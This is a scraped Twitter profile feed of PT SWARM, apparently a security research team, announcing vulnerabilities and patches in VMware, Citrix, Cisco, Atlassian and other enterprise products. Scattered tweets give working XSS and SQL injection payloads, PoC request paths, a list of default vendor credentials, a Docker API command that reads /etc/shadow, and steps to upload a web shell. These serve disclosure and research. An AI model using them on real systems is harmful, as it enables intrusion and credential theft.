PT SWARM @ptswarm Twitter profile

Last Seen Profiles

@Cazz_yay

@jandakembangstw

@tobymac472

@CoachEJHibb

@ozwalditou

@dul_turkporno

@tracehedo

@YasielPuig

@Tumie

@EliaSorianCosta

@mkelly007

@mybabatweets

@RutgersIISA

@leeleeCT

@looneydoomed

@0xNFTgiveaway

@NSBSport

@Jarvdusa

@RAED_ARN

@LittleDKrech

@sarameikasai

@NickPinky0x

@ZenciT

@ppp838qqq

@EH_HERACLES

@gustavo_zotta

@CrafdData

@ishc1967

@leventaksoy5

@stwbryn

@ceostacy

@RealChrisCal

@snoozrz

@powers1av3

@OrnithologyGam1

@kbowdendavies

PT SWARM

@ptswarm

4 years

New attack! Our researcher Arseniy Sharoglazov has discovered a method to connect to LDAP via #MSExchange from the Internet and access the whole Active Directory database. Read the research:

10

658

1K

PT SWARM

@ptswarm

4 years

We found an Unauthenticated Arbitrary File Read vulnerability in VMware vCenter. VMware revealed that this vulnerability was patched in 6.5u1, but no CVE was assigned. The PoC ⬇️

16

476

1K

PT SWARM

@ptswarm

4 years

💥Easy RCE Ports Java RMI: 1090,1098,1099,4444,11099,47001,47002,10999 WebLogic: 7000-7004,8000-8003,9000-9003,9503,7070,7071 JDWP: 45000,45001 JMX: 8686,9012,50500 GlassFish: 4848 jBoss: 11111,4444,4445 Cisco Smart Install: 4786 HP Data Protector: 5555,5556 #ptswarmTechniques

9

427

1K

PT SWARM

@ptswarm

4 years

New XML technique! Encode any DTD/XML inside an internal entity, and fly under WAF radars! 💥 XXE WAF Bypass 💥 Works when there is no XXE, but there is a vuln in the XML body, e.g. SQL Injection #ptswarmTechniques

7

382

908

PT SWARM

@ptswarm

4 years

⚡️New DNS Out-of-Band vector for MSSQL Injections in SELECT statement! Can be used for completely blind #sqli . Use fn_trace_gettable and #Burp Collaborator👍. #ptswarmTechniques

6

376

908

PT SWARM

@ptswarm

3 years

💥VMware fixed an Unauth RCE in vCenter (CVE-2021-21972) found by our researcher Mikhail Klyuchnikov. CVSS: 9.8 🔥 Advisory:

19

379

896

PT SWARM

@ptswarm

2 years

🔥 We have reproduced the fresh CVE-2022-1388 in F5's BIG-IP. Successful exploitation could lead to RCE from an unauthenticated user. Patch ASAP!

18

270

792

PT SWARM

@ptswarm

3 years

Since the PoC for the VMware vCenter RCE (CVE-2021-21972) is now readily available, we're publishing our article covering all of the technical details. Read the article:

Unauthorized RCE in VMware vCenter

Since the PoC for the VMware vCenter RCE (CVE-2021-21972) is now readily available, we’re publishing our article covering all of the technical details. In fall of 2020, I discovered couple vulnerab...

swarm.ptsecurity.com

6

435

775

PT SWARM

@ptswarm

3 years

🔥 We have reproduced the fresh CVE-2021-41773 Path Traversal vulnerability in Apache 2.4.49. If files outside of the document root are not protected by "require all denied" these requests can succeed. Patch ASAP!

16

379

747

PT SWARM

@ptswarm

4 years

➡️Default creds for #redteam Cisco: cisco:cisco Citrix: nsroot:nsroot Dell iDRAC: root:calvin Juniper: super:juniper123 pfSense: admin:pfsense SAP: SAP*:06071992 Tomcat: tomcat:tomcat UniFi: ubnt:ubnt Weblogic: weblogic:weblogic1 Zabbix: Admin:zabbix #ptswarmTechniques

9

265

751

PT SWARM

@ptswarm

2 years

🔥 A tip for getting RCE in Jetty apps with just one XML file!

7

245

740

PT SWARM

@ptswarm

3 years

💥Easy RCE Ports (part 2) IBM WebSphere: 8880 Apache Hadoop: 8088 Redis: 6379 Docker: 2375 Apache Solr: 8983 Zoho Manageengine Desktop: 8383 Atlassian Crowd: 4990 Portainer: 9000 Hashicorp Consul: 8500 Apache Spark: 6066 #ptswarmTechniques

4

268

683

PT SWARM

@ptswarm

3 years

🎁PoC for XSS in Cisco ASA (CVE-2020-3580) POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1 Host: ciscoASA.local Content-Type: application/x-www-form-urlencoded Content-Length: 44 SAMLResponse="><svg/onload=alert('PTSwarm')>

16

284

665

PT SWARM

@ptswarm

2 years

💥 New attack! Our researcher Arseniy Sharoglazov discovered a PHP's Arbitrary Object Instantiation with no user-defined classes. It was turned to RCE! Read the research:

8

256

638

PT SWARM

@ptswarm

8 months

⚠️ We have reproduced CVE-2023-22515 in Atlassian Confluence. Broken access control allows unauthenticated users to gain administrative access to the web application! Update your software ASAP!

8

171

626

PT SWARM

@ptswarm

4 years

New gadget chain for deserialization in Zend Framework applications. Triggers on __destruct(), gives RCE and works in PHP 7. #ptswarmTechniques

3

222

607

PT SWARM

@ptswarm

2 years

🙀 Our researcher Arseniy Sharoglazov found a new technique for discovering second-level domains! Useful for: 🐞 Bughunters, for discovering vulns on new domains 🐛 Threathunters, for discovering malicious domains 🎃 Everyone else Read the research:

13

250

577

PT SWARM

@ptswarm

4 years

Kerberoasting without SPNs! Read the research by Arseniy Sharoglazov:

6

295

563

PT SWARM

@ptswarm

2 years

🔥 We have reproduced the fresh CVE-2022-22954 Server-Side Template Injection in VMware Workspace ONE Access. Successful exploitation could lead to RCE from an unauthenticated user. Patch ASAP!

7

207

554

PT SWARM

@ptswarm

4 years

💉Advanced MSSQL Injection Tricks💉 🩸 New DNS Out-Of-Band vector in SELECT statement 🩸 Quick exploitation: Get all table data in one query 🩸 Read local files in SELECT statement and more! Read the article:

Advanced MSSQL Injection Tricks

We compiled a list of several techniques for improved exploition of MSSQL injections. All the vectors have been tested on at least three of the latest versions of Microsoft SQL Server: 2019, 2017,...

swarm.ptsecurity.com

1

260

520

PT SWARM

@ptswarm

3 years

A swarm of FortiWeb CVE-s is here: 1️⃣Unauth SQL Injection (CVE-2020-29015) 2️⃣Unauth Buffer Overflow (CVE-2020-29016) 3️⃣Unauth Buffer Overflow (CVE-2020-29019) 4️⃣Format String (CVE-2020-29018) Attributed to: Andrey Medov Advisories:

5

236

517

PT SWARM

@ptswarm

3 years

💥Easy RCE using Docker API on port 2375/tcp docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine File Access: cat /mnt/etc/shadow RCE: chroot /mnt #ptswarmTechniques

4

163

512

PT SWARM

@ptswarm

4 years

Read this article about CVE-2019-19781 RCE in Citrix by its author, Mikhail Klyuchnikov:

4

251

507

PT SWARM

@ptswarm

2 years

✅ A Tip for SQL Injection WAF Bypass

1

147

497

PT SWARM

@ptswarm

3 years

🚨RCE on a backend IIS server via file upload with an atypical file extension. 📋More community curated payloads can be found at #tipstoknow

2

190

490

PT SWARM

@ptswarm

2 years

😎 F5 BIG-IP RCE (CVE-2022-1388). How it works?

3

186

484

PT SWARM

@ptswarm

3 months

🎁 Source Code Disclosure in IIS 10.0! Almost. There is a method to reveal the source code of some .NET apps. Here's how it works. 👉

3

186

477

PT SWARM

@ptswarm

1 year

🧙‍♂️ CVE-2022-44268 - a vulnerability in ImageMagick that could lead to an arbitrary file read. How does it work? See here 👇

4

131

462

PT SWARM

@ptswarm

4 years

We have reproduced the CVE-2020-1472 #zerologon vulnerability! It's an unauth RCE for Domain Controllers.

4

204

459

PT SWARM

@ptswarm

3 years

Open redirect parameters from every disclosed @Hacker0x01 report ever, composed in one wordlist The full list (48 unique): Top 5 sorted by popularity 👇 #ptswarmTechniques

6

173

458

PT SWARM

@ptswarm

2 years

🔥 Veeam fixed an Unauth RCE (CVE-2022-26500, CVE-2022-26501) in Veeam Backup & Replication and a Local Privilege Escalation (CVE-2022-26503) in Veeam Agent for Microsoft Windows found by our researcher @ultrayoba . Advisory:

7

184

449

PT SWARM

@ptswarm

7 days

🧧 Our researcher Igor Sak-Sakovskiy has discovered an XXE in Chrome and Safari by ChatGPT! Bounty: $28,000 💸 Here is the write-up 👉

10

176

558

PT SWARM

@ptswarm

2 years

💥 We have reproduced CVE-2022-31626, an RCE in PHP <= 7.4.29 which can be triggered via a rogue MySQL/MariaDB server! It's a Heap Overflow, works with MySQLi/PDO, and doesn't require LOAD LOCAL INFILE. The PoC 👉

4

167

413

PT SWARM

@ptswarm

3 years

✅ The way to bypass #XSS WAF in web applications. #tipstoknow

3

131

402

PT SWARM

@ptswarm

4 years

Very fast exploitation of #sqli in #MySQL >= 5.7.22 using the 'json_arrayagg()' function. SELECT json_arrayagg(concat_ws(0x3a,table_schema,table_name)) from INFORMATION_SCHEMA.TABLES; ❌group_concat() = 1024 symbols 👍json_arrayagg() > 16,000,000 symbols #ptswarmTechniques

3

169

398

PT SWARM

@ptswarm

4 years

Atlassian Jira unauthenticated user enumeration (CVE-2020-14181)! Versions affected: Jira < 7.13.6 8.0.0 ≤ Jira < 8.5.7 8.6.0 ≤ Jira < 8.12.0 Discovered by Mikhail Klyuchnikov. Advisory: /secure/ViewUserHover.jspa?username=test The PoC ☝️

3

168

394

PT SWARM

@ptswarm

2 years

🐞 PoC for a Post-Auth RCE (CVE-2021-38163) in SAP NetWeaver. The vulnerability was found by our researcher Mikhail Klyuchnikov. Reproduction steps: 1. Upload a jsp shell using the /irj/servlet/prt/portal/prtroot/com.sap.visualcomposer.VCParMigrator path 2. Execute OS commands

2

158

380

PT SWARM

@ptswarm

8 months

🔥 We have reproduced the fresh CVE-2023-42793 in JetBrains TeamCity. Authentication bypass allows an external attacker to gain administrative access to the server and execute any commands on it. Update your software ASAP!

6

85

367

PT SWARM

@ptswarm

3 years

#Pentest pivoting cheat sheet for #redteam

3

122

366

PT SWARM

@ptswarm

3 years

Atlassian Jira Unauth User Enumeration (CVE-2020-36289) discovered by our researcher Mikhail Klyuchnikov. Jira < 8.5.13 8.6.0 ≤ Jira < 8.13.5 8.14.0 ≤ Jira < 8.15.1 PoC: /secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin Advisory:

5

128

357

PT SWARM

@ptswarm

2 years

🔥 We have reproduced the fresh CVE-2022-24086 Improper Input Validation vulnerability in Magento Open Source and Adobe Commerce. Successful exploitation could lead to RCE from an unauthenticated user.

9

123

353

PT SWARM

@ptswarm

4 years

💥New article "Path Traversal on Citrix XenMobile Server" with a step-by-step guide to disclosing encryption keys, decrypting passwords, and thoroughly understanding CVE-2020-8209 by our researcher Andrey Medov. Read all about it: The PoC⬇️

1

170

354

PT SWARM

@ptswarm

3 years

🐞PoC for a boolean-based #SQLi in Rapid7 Nexpose <= 6.6.48 (CVE-2020-7383) https://nexpose.local:3780/data/discoveryAsset/config/folderPath?path=[sqli]

1

133

341

PT SWARM

@ptswarm

8 months

💥 We have reproduced both CVE-2023–29357 and CVE-2023–24955 in Microsoft SharePoint. The chain allows unauthenticated users to execute arbitrary commands on the server. Update your software ASAP!

3

108

339

PT SWARM

@ptswarm

2 years

🥳 We have reproduced an Arbitrary File Read for an internal site of Skype for Business / MS Lync! CVE: CVE-2022-26911 Subdomains: dialin, meet, lyncdiscover, sip, ... Original advisory: The PoC ⤵️

3

120

339

PT SWARM

@ptswarm

2 months

🏭 We've tested the new RCE in Microsoft Outlook (CVE-2024-21378) in a production environment and confirm it works well! A brief instruction for red teams: 1. Compile our enhanced DLL 👉 2. Use NetSPI's ruler and wait! No back connect required! 🔥 📐📏

4

130

342

PT SWARM

@ptswarm

4 years

New article by Mikhail Klyuchnikov: RCE in F5 Big-IP (CVE-2020-5902)

4

163

330

PT SWARM

@ptswarm

4 months

💥 We have reproduced CVE-2023-22527 in Atlassian Confluence. A template injection vulnerability allows an unauthenticated attacker to achieve RCE on an affected instance. Update your software ASAP!

5

91

332

PT SWARM

@ptswarm

3 years

4 XSS in FortiWeb (CVE-2021-22122), found by Andrey Medov, have been patched. Two example PoCs: 1⃣ /error3?msg=30&data=';alert('xss');// 2⃣ /omni_success?cmdb_edit_path=");alert('xss');// Advisory:

2

112

293

PT SWARM

@ptswarm

1 year

🍃 Are you stuck on authorization bypass in a Spring app? This tip can be helpful to you!

2

87

294

PT SWARM

@ptswarm

4 years

We are releasing an article about an Authenticated Arbitrary File Read vulnerability (CVE-2019-19499) in Grafana! Dive into Go SQL client libraries, quirks of the MySQL protocol, and more!

Grafana 6.4.3 Arbitrary File Read

An article about an Arbitrary File Read vulnerability (CVE-2019-19499) in Grafana

swarm.ptsecurity.com

2

119

291

PT SWARM

@ptswarm

3 years

🏆Top 10 parameters for SSRF from disclosed @Hacker0x01 reports and public writeups #ptswarmTechniques

0

103

288

PT SWARM

@ptswarm

3 years

We are proud to announce that "Attacking MS Exchange Web Interfaces" by Arseniy Sharoglazov was voted into the "Top 10 web hacking techniques of 2020"! Our sincere gratitude goes out to the community and the @PortSwiggerRes panel. Read the research:

Attacking MS Exchange Web Interfaces

Describing all the techniques for attacking MS Exchange in Q2 2020 and introducing a new one: the LDAP via Exchange attack

swarm.ptsecurity.com

0

99

286

PT SWARM

@ptswarm

2 years

🦥 Everyone learned to run pip install colorama to exploit Atlassian Confluence RCE (CVE-2022-26134), so let’s see how the vulnerability works under the hood. Here we show our simplified payload which demonstrates a workflow inside the vulnerable code ⤵️

1

90

270

PT SWARM

@ptswarm

3 years

New article "From 0 to RCE: Cockpit CMS" by our researcher Nikita Petrov. The story of discovering an unauth NoSQL injection and abusing it to retrieve admin hashes, change passwords, and execute commands!

From 0 to RCE: Cockpit CMS

Our team searched for bugs in the source code of Cockpit, an open-source content management system. Here is the description of Cockpit from its official site: Cockpit is a headless CMS with an...

swarm.ptsecurity.com

2

123

270

PT SWARM

@ptswarm

3 years

✍️We would like to share with the community some uncommon but not unique cases from our experience. Let us know if you like this format. ✅Stored XSS using .xbl files.

3

108

268

PT SWARM

@ptswarm

3 years

🙈🙉🙊Citrix has removed the acknowledgement of our researcher Mikhail Klyuchnikov who discovered and reported CVE-2019-19781 - the Citrix ADC RCE! @Citrix we will be pleased to hear your response. Current: Mar 2021:

22

105

266

PT SWARM

@ptswarm

3 years

🔥New article: "Swarm of Palo Alto PAN-OS vulnerabilities". Two RCEs and other bugs found by our researchers Mikhail Klyuchnikov & Nikita Abramov. Full analysis 👆

0

136

263

PT SWARM

@ptswarm

4 years

OpenFire allows to get Arbitrary File Read and Unauthenticated Full Read SSRF via its 9090/http and 9091/https ports. The details are in the article by Alexandr Shvetsov (CVE-2019-18393 & CVE-2019-18394):

3

112

254

PT SWARM

@ptswarm

3 years

New article: "Cisco Hyperflex: How We Got RCE Through Login Form and Other Findings" Read more about critical vulnerabilities (CVSS 9.8, 7.3 and 5.3) found by our researchers @Ankorik & @__mn1__ :

0

118

257

PT SWARM

@ptswarm

4 years

A swarm of Palo Alto PAN-OS CVE-s is here: 1⃣ Post-Auth RCE (CVE-2020-2037) 2⃣ Post-Auth RCE (CVE-2020-2038) 3⃣ Unauth DoS (CVE-2020-2039) 4⃣ Cross-Site Scripting (CVE-2020-2036) Attributed to: Mikhail Klyuchnikov & Nikita Abramov Advisory:

0

146

253

PT SWARM

@ptswarm

2 years

🎁 PoC for a Post-Auth SQL-Injection (CVE-2022-0757) in Nexpose Vulnerability Scanner <= 6.6.128 Default port: 3780 Default username: nxadmin Affected handler: /data/asset/filterAssets Full Request ⤵️

0

91

249

PT SWARM

@ptswarm

3 years

VMware fixed CVE-2021-21975 and CVE-2021-21983, which when chained together lead to an unauth RCE in vRealize Operations. The vulnerabilities were found by our researcher Egor Dimitrenko. Advisory:

3

98

246

PT SWARM

@ptswarm

3 years

⚠️ Zoom fixed two post-auth RCE (CVE-2021-34416, CVE-2021-34414) and remote system crash (CVE-2021-34415) in Zoom on-premise Meeting Connector found by our researchers Nikita Abramov and Egor Dimitrenko. Advisory:

2

83

245

PT SWARM

@ptswarm

3 years

📲 We are pleased to present the utility developed by our researcher @lmpact_l for Flutter apps traffic monitoring. Just make app trust installed certificates by repacking it with reFlutter and hunt bugs using Burp Suite. No root, no VPN, no more hassle!

6

84

242

PT SWARM

@ptswarm

3 years

✅ Site-wide CSRF using the GraphQL API #tipstoknow

2

92

243

PT SWARM

@ptswarm

2 years

✅ A tip for obtaining NT hash from GenericWrite/All privileges. Works for both user and machine accounts.

6

83

243

PT SWARM

@ptswarm

3 years

💥Fortinet fixed a Post-Auth RCE in FortiWeb (CVE-2021-22123) found by our researcher Andrey Medov. This vulnerability was part of an Unauth RCE chain submitted together with CVE-2020-29015 (Unauth SQL Injection), fixed by Fortinet earlier. Advisory:

1

88

237

PT SWARM

@ptswarm

3 years

VMware fixed an Unauth RCE in View Planner (CVE-2021-21978) found by our researcher Mikhail Klyuchnikov. Advisory:

4

73

233

PT SWARM

@ptswarm

3 years

VMware fixed a Post-Auth RCE in vSphere Replication (CVE-2021-21976) found by our researcher Egor Dimitrenko. Advisory:

0

87

229

PT SWARM

@ptswarm

3 years

✨New Article: Vulnerabilities in McAfee ePolicy Orchestrator 🐞Unauth RCE chain via CSRF + SSRF + MSSQL MiTM server 🐞Post-auth RCE via ZipSlip with Windows Defender bypass 🐞Reflected XSS CVE-2020-7318 assigned, research by Mikhail Klyuchnikov

2

94

229

PT SWARM

@ptswarm

3 years

✨PoC for SSRF in IBM QRadar SIEM (CVE-2020-4786)✨ GET /console/chartServer?output=image&data= http://127.0.0.1:8080

0

89

229

PT SWARM

@ptswarm

2 years

🥷 Useful hotkeys to become @Burp_Suite ninja

4

65

216

PT SWARM

@ptswarm

2 years

🎁 PoC for a stored XSS in MyBB < 1.8.25 (CVE-2021-27279). The vulnerability was found by our researcher Igor Sak-Sakovskiy. Payload: [email]a @a .a?[email=a @a .a? onmouseover=alert(1) a]a[/email][/email] Advisory:

3

73

214

PT SWARM

@ptswarm

3 years

New article "How we bypassed bytenode and decompiled Node.js (V8) bytecode in Ghidra" by our researcher Sergey Fedonin.

2

68

193

PT SWARM

@ptswarm

3 years

Cockpit CMS fixed three Unauth NoSQL Injections (CVE-2020-35846, CVE-2020-35847, CVE-2020-35848) found by our researcher Nikita Petrov. These vulnerabilities allow to retrieve an admin's hash or change his password and then execute commands!

3

71

188

PT SWARM

@ptswarm

2 years

💥 New article "Fuzzing for XSS via nested parsers condition" by our researcher @Psych0tr1a . This techniques allowed us to find a bunch of vulnerabilities in popular web products that no one had noticed before!

Fuzzing for XSS via nested parsers condition

When communicating online, we constantly use emoticons and put text in bold. Some of us encounter markdown on Telegram or GitHub, while forum-dwellers might be more familiar with BBCode. All this is...

swarm.ptsecurity.com

2

81

188

PT SWARM

@ptswarm

4 years

📝New article "RDS Shadowing - Beyond the Shadowed Session" by our researcher Roman Maximov. ✅What Remote Desktop Services Shadowing is and how it works ✅How to shadow a session and remain undetected ✅How to obtain persistence Read the article:

2

88

189

PT SWARM

@ptswarm

4 years

The advisory for multiple unauth RCE in Cisco Integrated Management Controller (CVE-2020-3470) is now out! Buffer Overflows lead to RCE with uid=0 (root) privileges Discovered by Nikita Abramov

1

86

184

PT SWARM

@ptswarm

2 years

😼 You discovered an XSS, but it has no impact? Our mobile hacker @lmpact_l knows the drill 🤑🔽

4

51

191

PT SWARM

@ptswarm

4 years

Rapid7 Nexpose <= 6.6.48 boolean-based #SQLi found by Mikhail Klyuchnikov. "This vulnerability could have allowed an authenticated user with a low permission level to access resources beyond their assigned permissions." - Rapid7 CVE-2020-7383 👉

1

78

184

PT SWARM

@ptswarm

2 years

🔥 The persistent XSS in any message in vBulletin! Patched from 13 Apr 2021. The vulnerability was found by our researcher @Psych0tr1a . PoC: [VIDEO="aaa;000"]a[FONT="a onmouseover=alert(location) a"]a[/FONT]a[/VIDEO] Advisory:

5

74

179

PT SWARM

@ptswarm

2 years

🚨 New article by our researcher Aleksey Solovev: "Researching Open Source apps for XSS to RCE flaws". Read the article:

Researching Open Source apps for XSS to RCE flaws

Cross-Site Scripting (XSS) is one of the most commonly encountered attacks in web applications. If an attacker can inject a JavaScript code into the application output, this can lead not only to...

swarm.ptsecurity.com

0

66

181

PT SWARM

@ptswarm

4 years

IDA Pro Tips to Add to Your Bag of Tricks, from our researcher Vyacheslav Moskvin. #idapro #idatips

0

86

178

PT SWARM

@ptswarm

3 years

🚨 New article: "WinRAR’s vulnerable trialware: when free software isn’t free" by our researcher @Psych0tr1a . In this article, we show how vulnerabilities in trialware could beсome a gate for hackers.

1

64

160

PT SWARM

@ptswarm

4 years

The advisory for our CVE-2020-3452 Unauthorized Remote File Reading in Cisco ASA is now out:

2

74

161

PT SWARM

@ptswarm

2 years

⚠️Synacor fixed an Authenticated RCE (CVE-2022-27925) in Zimbra Collaboration Suite found by our researcher Mikhail Klyuchnikov. So far, no advisory, but the patch is available:

4

56

159

PT SWARM

@ptswarm

3 years

RARLAB fixed a MITM (CVE-2021-35052) in WinRAR found by our researcher Igor Sak-Sakovskiy. This attack could be leveraged to achieve command execution on a user's machine. Advisory:

1

72

154

PT SWARM

@ptswarm

2 years

PoC for a stored XSS in (CVE-2021-22886). The vulnerability was found by our researcher Igor Sak-Sakovskiy. Payload: [ ]() <; a|Text>th/a

2

36

155

PT SWARM

@ptswarm

3 years

⚡️SAP fixed Post-Auth RCE (CVE-2021-38163) in SAP NetWeaver found by our researcher Mikhail Klyuchnikov. CVSS 9.9 🔥 No credits from @SAP again. Advisory:

3

56

152

PT SWARM

@ptswarm

3 years

Cisco fixed an Unauth DoS (CVE-2021-34704) in Cisco ASA and Cisco FTD found by our researcher Nikita Abramov. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition. Shodan: 242,070 results 🔥 Advisory:

3

46

151

PT SWARM

@ptswarm

3 years

VMware fixed an Unauth RCE in vRealize Business for Cloud (CVE-2021-21984) found by our researcher Egor Dimitrenko. Advisory:

1

56

152

PT SWARM

@ptswarm

2 years

🐳 Red Hat fixed an Unauth XXE (CVE-2022-2414) in FreeIPA found by our researcher @elk0kc . In some cases, it allows attackers to read the Directory Manager password from the config of FreeIPA and take full control of the infrastructure. Advisory:

2

53

144

PT SWARM

@ptswarm

3 years

SonicWall fixed a Post-Auth RCE (CVE-2021-20026) in Network Security Manager and an Unauth Buffer Overflow (CVE-2021-20027) in SonicOS found by our researcher Nikita Abramov. Advisory:

0

66

140

PT SWARM

@ptswarm

4 years

The advisory for an Unauthenticated Arbitrary File Read vulnerability in Citrix XenMobile (CVE-2020-8209) found by our researcher Andrey Medov is now out! The fixes were released privately 3 weeks ago, so we hope a lot of companies are protected now 🙂

2

78

136

PT SWARM

@ptswarm

3 years

Citrix has restored the acknowledgment of our researchers in its advisories! 🥰 We would like to express our gratitude to the community for your support and making information security more transparent.

1

26

133

PT SWARM

@ptswarm

2 years

🚨 New article by our researchers @__mn1__ and @elk0kc about unauth RCEs in VMware products: "Hunting for bugs in VMware: View Planner and vRealize Business for Cloud". Read the article: This is the first article about our VMware research. More to come!

Hunting for bugs in VMware: View Planner and vRealize Business for Cloud

Last year we found a lot of exciting vulnerabilities in VMware products. They were disclosed to the vendor, responsibly and have been patched. It’ll be a couple of articles, that disclose the details...

swarm.ptsecurity.com

0

67

132

PT SWARM

@ptswarm

4 years

Checkpoint ICA Management Tool (CVE-2020-6020) research by Mikhail Klyuchnikov & Nikita Abramov. 1⃣Send /etc/shadow to yourself via SMTP 2⃣Simple DoS

2

60

133

PT SWARM

@ptswarm

2 years

⚠️ Rapid7 fixed an SQL-Injection (CVE-2022-0757) and an XSS (CVE-2022-0758) in Nexpose Vulnerability Scanner found by our researcher Aleksey Solovev. Advisory:

0

37

126

PT SWARM

@ptswarm

3 years

⚠️F5 fixes BIG-IP Unauth DoS (CVE-2020-27716) found by our researcher Nikita Abramov. Versions affected: 15.0.0 ≤ BIG-IP(APM) < 15.1.1 BIG-IP(APM) < 14.1.3.1 The advisory:

3

38

125